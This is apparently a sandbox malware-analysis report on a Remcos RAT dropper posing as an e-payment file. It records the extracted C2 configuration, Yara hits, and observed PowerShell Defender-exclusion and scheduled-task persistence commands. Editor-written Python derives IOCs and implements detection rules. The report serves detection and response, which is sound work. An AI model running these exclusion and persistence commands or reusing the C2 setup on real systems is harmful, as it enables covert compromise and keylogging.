
Windows Analysis Report
e-Payment.NET.CMS4006975815.exe

Overview

General Information

Sample name:e-Payment.NET.CMS4006975815.exe
Analysis ID:1465312
MD5:b16699f8fd5e68de16d8904ec7cd3ed2
SHA1:45fac6b1832fad2fef90e1064ab4e78e0b164737
SHA256:d21d0451a7a8b112776118d88154bf7eab2703b13bf6ae1dcaec2f959bf42305
Tags:exe

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

  • System is w10x64
  • e-Payment.NET.CMS4006975815.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe" MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • JXHPwNYzysUjKo.exe (PID: 8008 cmdline: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
    • schtasks.exe (PID: 8176 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JXHPwNYzysUjKo.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe" MD5: B16699F8FD5E68DE16D8904EC7CD3ED2)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool used to remotely control computers. It is advertised as legitimate software for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Once installed, Remcos opens a backdoor on the computer, granting the remote operator full access. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "62.102.148.166:3319", "Assigned name": "banksy", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_rpklfmytvo", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "egsy"}
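Two details in this configuration matter for response. "Install flag" is Disable, so the embedded Remcos build is not configured to copy itself or to register a Run key; the persistence visible in the process tree (the copy to C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe and the task Updates\JXHPwNYzysUjKo created from an XML file in Temp) is the work of the .NET loader, not of the Remcos configuration. And the "Host:Port:Password" field carries only host and port (62.102.148.166:3319), so a parser has to treat the password as optional. The example below is added here by the editor and is not from the report or from any Remcos tooling: it loads the extracted JSON and turns it into the artifacts a responder would hunt for, namely the C2 endpoints, the mutex, the registry key HKCU\SOFTWARE\<mutex>\EXEpath that the report's own registry event confirms, and the keylog file path. The mapping of the location name "AppData" to %APPDATA%, the use of "|" to separate multiple C2 entries, and the assumption that the Run-key options only apply when installation is enabled are the example's own, not facts from this report.

```python
import json

# Configuration exactly as the sandbox extracted it (copied from the report above).
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "62.102.148.166:3319", "Assigned name": "banksy", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_rpklfmytvo", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "egsy"}'''

STANDARD_PORTS = {80, 443}


def _enabled(cfg, key):
    """The extractor writes flags as 'Enable'/'Disable' or '1'/'0'."""
    return cfg.get(key, "Disable") not in ("Disable", "0", "")


def _resolve(location):
    # Assumption: the extractor's location name 'AppData' means %APPDATA%;
    # any other value is passed through unchanged.
    return "%APPDATA%" if location == "AppData" else location


def parse_c2(field):
    """Split 'Host:Port:Password' into (host, port, password) tuples.

    The password is optional (this report's value has none).  Splitting on
    '|' for multiple C2 entries is an assumption about the extractor's output
    format, not something this report shows.
    """
    entries = []
    for chunk in field.split("|"):
        chunk = chunk.strip()
        if not chunk:
            continue
        parts = chunk.split(":")
        if len(parts) < 2:
            raise ValueError(f"malformed C2 entry: {chunk!r}")
        password = parts[2] if len(parts) > 2 and parts[2] else None
        entries.append((parts[0], int(parts[1]), password))
    return entries


def derive_iocs(cfg):
    """Turn the configuration into host and network artifacts to hunt for."""
    mutex = cfg["Mutex"]
    iocs = {
        "c2": parse_c2(cfg["Host:Port:Password"]),
        "mutex": mutex,
        # Remcos stores its own path under a key named after the mutex; the
        # report's registry event shows exactly this value being written.
        "registry": [f"HKCU\\SOFTWARE\\{mutex}\\EXEpath"],
        "files": [],
        "notes": [],
    }
    for host, port, _ in iocs["c2"]:
        if port not in STANDARD_PORTS:
            iocs["notes"].append(f"C2 {host}:{port} uses a non-standard port")

    if _enabled(cfg, "Install flag"):
        install_dir = f'{_resolve(cfg["Install path"])}\\{cfg["Copy folder"]}'
        iocs["files"].append(f'{install_dir}\\{cfg["Copy file"]}')
        # Assumption: the Run-key options only take effect when installation is enabled.
        run_value = cfg["Startup value"]
        if _enabled(cfg, "Setup HKCU\\Run"):
            iocs["registry"].append(f"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{run_value}")
        if _enabled(cfg, "Setup HKLM\\Run"):
            iocs["registry"].append(f"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{run_value}")
    else:
        iocs["notes"].append(
            "Install flag disabled: the payload neither copies itself nor sets a Run key; "
            "any persistence observed comes from the loader, not from this configuration")

    if _enabled(cfg, "Keylog flag"):
        iocs["files"].append(f'{_resolve(cfg["Keylog path"])}\\{cfg["Keylog folder"]}\\{cfg["Keylog file"]}')
    if _enabled(cfg, "Screenshot flag"):
        iocs["files"].append(f'{_resolve(cfg["Screenshot path"])}\\{cfg["Screenshot file"]}')
    return iocs


def iocs_from_report():
    """Convenience wrapper: parse the embedded JSON and derive the IOCs."""
    return derive_iocs(json.loads(REMCOS_CONFIG_JSON))


if __name__ == "__main__":
    for key, value in iocs_from_report().items():
        print(f"{key}: {value}")
```

For this configuration the only file artifact produced is %APPDATA%\egsy\logs.dat (the keylog), and the notes call out both the non-standard C2 port 3319 and the disabled install flag, which is the cue to look at the loader rather than the Remcos config for persistence.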
Yara matches in dumped memory (Source, Rule, Description, Author, Strings):

Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp
  Rule: Remcos, Description: detect Remcos in memory, Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x11454:$remcos: Remcos
  • 0x11cc8:$remcos: Remcos
  • 0x28474:$remcos: Remcos
  • 0x28ce8:$remcos: Remcos
  • 0x11d00:$url: Breaking-Security.Net
  • 0x28d20:$url: Breaking-Security.Net
  • 0x1650a:$resource: SETTINGS
  • 0x2d52a:$resource: SETTINGS
Source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
(The report lists 16 memory matches; only the first five are shown here.)
Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):

Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack
  Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown
  Strings:
  • 0x114dc:$funcs1: autogetofflinelogs
  • 0x114c0:$funcs2: clearlogins
  • 0x114f0:$funcs3: getofflinelogs
  • 0x11578:$funcs4: execcom
  • 0x114cc:$funcs5: deletekeylog
  • 0x11798:$funcs6: remscriptexecd
  • 0x115bc:$funcs7: getwindows
  • 0x10da0:$funcs8: fundlldata
  • 0x10d78:$funcs9: getfunlib
  • 0x107ec:$funcs10: autofflinelogs
  • 0x113b8:$funcs11: getclipboard
  • 0x114b4:$funcs12: getscrslist
  • 0x107e0:$funcs13: offlinelogs
  • 0x105c8:$funcs14: getcamsingleframe
  • 0x116e4:$funcs15: listfiles
  • 0x115e0:$funcs16: getproclist
  • 0x10828:$funcs17: onlinelogs
  • 0x11700:$funcs18: getdrives
  • 0x11784:$funcs19: remscriptsuccess
  • 0x10600:$funcs20: getcamframe
  • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack
  Rule: Remcos_1, Description: Remcos Payload, Author: kevoreilly
  Strings:
  • 0x11034:$name: Remcos
  • 0x118a8:$name: Remcos
  • 0x118fb:$name: REMCOS
  • 0x10688:$time: %02i:%02i:%02i:%03i
  • 0x11320:$time: %02i:%02i:%02i:%03i
  • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 06 47 3B 7D 0C 72
Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack
  Rule: Remcos, Description: detect Remcos in memory, Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x11034:$remcos: Remcos
  • 0x118a8:$remcos: Remcos
  • 0x118e0:$url: Breaking-Security.Net
  • 0x160ea:$resource: SETTINGS
Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack
  Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Author: ditekSHen
  Strings:
  • 0x10738:$s1: \Classes\mscfile\shell\open\command
  • 0x10720:$s2: eventvwr.exe
(The report lists 45 unpacked-PE matches; only the first five are shown here.)

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems)
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7656, ProcessName: powershell.exe
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe
  ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  CommandLine|base64offset|contains: ~2yzw
Source: Process started; Author: Florian Roth (Nextron Systems)
  Image: C:\Windows\SysWOW64\schtasks.exe, ProcessId: 8176, ProcessName: schtasks.exe
  CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
  ParentImage: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, ParentProcessId: 8008, ParentProcessName: JXHPwNYzysUjKo.exe
  ParentCommandLine: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
  CommandLine|base64offset|contains: *j
Source: Process started; Author: Florian Roth (Nextron Systems)
  Image: C:\Windows\SysWOW64\schtasks.exe, ProcessId: 7760, ProcessName: schtasks.exe
  CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
  ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe
  ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  CommandLine|base64offset|contains: *j
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7656, ProcessName: powershell.exe
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe
  ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  CommandLine|base64offset|contains: ~2yzw

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security
  Image: C:\Windows\SysWOW64\schtasks.exe, ProcessId: 7760, ProcessName: schtasks.exe
  CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
  ParentImage: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ParentProcessId: 7552, ParentProcessName: e-Payment.NET.CMS4006975815.exe
  ParentCommandLine: "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
  CommandLine|base64offset|contains: *j
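All of the Sigma events in the System Summary and Persistence sections share one detail worth building into any rule: the CommandLine says C:\Windows\System32\..., but the Image and NewProcessName fields are C:\Windows\SysWOW64\..., because the 32-bit dropper launches its children through WOW64 file-system redirection. A detection keyed on the full System32 path would miss every one of these events. The following example is added by the editor and is neither part of the Joe Sandbox report nor a copy of the Sigma rules it cites; it re-implements the core conditions of the three behaviours flagged here (PowerShell adding a Defender exclusion, schtasks /Create reading its XML from Temp, and schtasks spawned by a parent in a user-writable folder), matches on the binary name rather than the full path, and runs over process-creation events constructed from this report's process tree plus two benign administrative events that must not fire. The rule names and the ProcEvent record are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal Sysmon EID 1 / Security 4688 style process-creation record."""
    pid: int
    image: str
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    # Match on the file name only: the report shows CommandLine saying
    # System32\schtasks.exe while Image is SysWOW64\schtasks.exe, because the
    # 32-bit parent is subject to WOW64 file-system redirection.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^[a-z]:\\(Users|ProgramData)\\", re.IGNORECASE)
POWERSHELL_HOSTS = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")


def defender_exclusion(ev: ProcEvent) -> bool:
    """PowerShell adding or replacing a Microsoft Defender exclusion."""
    if _basename(ev.image) not in POWERSHELL_HOSTS:
        return False
    cl = ev.command_line.lower()
    # -Exclusion covers -ExclusionPath, -ExclusionProcess and -ExclusionExtension.
    return ("add-mppreference" in cl or "set-mppreference" in cl) and "-exclusion" in cl


def schtasks_xml_from_temp(ev: ProcEvent) -> bool:
    """schtasks /Create /XML with the task definition read from a Temp folder."""
    if _basename(ev.image) != "schtasks.exe":
        return False
    cl = ev.command_line
    return (re.search(r"/create\b", cl, re.IGNORECASE) is not None
            and re.search(r"/xml\b", cl, re.IGNORECASE) is not None
            and TEMP_DIR.search(cl) is not None)


def schtasks_user_writable_parent(ev: ProcEvent) -> bool:
    """schtasks /Create spawned by a parent that lives in a user-writable path."""
    return (_basename(ev.image) == "schtasks.exe"
            and re.search(r"/create\b", ev.command_line, re.IGNORECASE) is not None
            and USER_WRITABLE.match(ev.parent_image) is not None)


RULES = {
    "powershell_defender_exclusion": defender_exclusion,
    "schtasks_xml_from_temp": schtasks_xml_from_temp,
    "schtasks_user_writable_parent": schtasks_user_writable_parent,
}


def evaluate(events):
    """Return {pid: [rule names]} for every event that fires at least one rule."""
    hits = {}
    for ev in events:
        fired = [name for name, check in RULES.items() if check(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed events: four taken from this report's process tree (note the
# SysWOW64 Image paths) plus two benign administrative ones that must not fire.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
COPY = r"C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"

SAMPLE_EVENTS = [
    ProcEvent(7656, PS, f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{DROPPER}"', DROPPER),
    ProcEvent(7704, PS, f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{COPY}"', DROPPER),
    ProcEvent(7760, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"', DROPPER),
    ProcEvent(8176, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"', COPY),
    # benign: an admin querying the task from cmd.exe, and a PowerShell session reading Defender settings
    ProcEvent(9001, r"C:\Windows\System32\schtasks.exe", r'schtasks.exe /Query /TN "Updates\JXHPwNYzysUjKo"', r"C:\Windows\System32\cmd.exe"),
    ProcEvent(9002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-MpPreference", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Run against the constructed events, both PowerShell processes (7656, 7704) fire the exclusion rule and both schtasks processes (7760, 8176) fire the two task rules, while the query from cmd.exe and the Get-MpPreference call produce no hits. The second schtasks event (parent JXHPwNYzysUjKo.exe in AppData\Roaming) is the one to treat as persistence being re-armed by the dropped copy.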

            Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security
  EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, ProcessId: 7948
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\remcos_rpklfmytvo\EXEpath
  Details: [u...}7|.....KR.{G.9~.?.$....ui.R":G.v.^$3[QJ....@.... (binary value as rendered by the sandbox)
            No Snort rule has matched


            AV Detection

Source: e-Payment.NET.CMS4006975815.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Avira: detection malicious, Label: HEUR/AGEN.1308647
Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, Malware Configuration Extractor: Remcos {"Host:Port:Password": "62.102.148.166:3319", "Assigned name": "banksy", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_rpklfmytvo", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "egsy"}
Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, ReversingLabs: Detection: 42%
Source: e-Payment.NET.CMS4006975815.exe, ReversingLabs: Detection: 42%
Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Joe Sandbox ML: detected
Source: e-Payment.NET.CMS4006975815.exe, Joe Sandbox ML: detected
Source: e-Payment.NET.CMS4006975815.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: e-Payment.NET.CMS4006975815.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?